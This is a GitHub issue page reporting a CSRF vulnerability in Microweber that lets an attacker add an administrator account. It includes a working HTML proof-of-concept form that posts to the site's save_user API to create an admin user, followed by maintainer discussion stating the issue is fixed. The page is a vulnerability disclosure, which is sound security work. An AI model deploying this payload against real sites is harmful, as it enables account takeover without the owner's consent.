Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can add the administrator account #483

Closed
AutismJH opened this issue Aug 31, 2018 · 3 comments
Closed

Comments

@AutismJH
Copy link

After the administrator logged in, open the following page to add an administrator.
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo1.microweber.com/api/save_user" method="POST">
      <input type="hidden" name="id" value="0" />
      <input type="hidden" name="thumbnail" value="" />
      <input type="hidden" name="username" value="3333" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="email" value="3333&#64;qq&#46;com" />
      <input type="hidden" name="first&#95;name" value="222" />
      <input type="hidden" name="last&#95;name" value="222" />
      <input type="hidden" name="is&#95;active" value="1" />
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="basic&#95;mode" value="1" />
      <input type="hidden" name="api&#95;key" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@peter-mw
Copy link
Member

Hi, you can add admin user only if you are logged as admin user

if you try to add admin user and you are not logged in as admin , this will not work

@attritionorg
Copy link

A CSRF attack leverages the admin being logged in, and exploits it by tricking them into clicking a link to perform a given action. In this case, if the admin clicks that link, they are logged in and that form they are clicking will add a new admin user which the attacker prompted. More info: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

@peter-mw
Copy link
Member

hi, the same issue is reported on #484 and its already fixed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants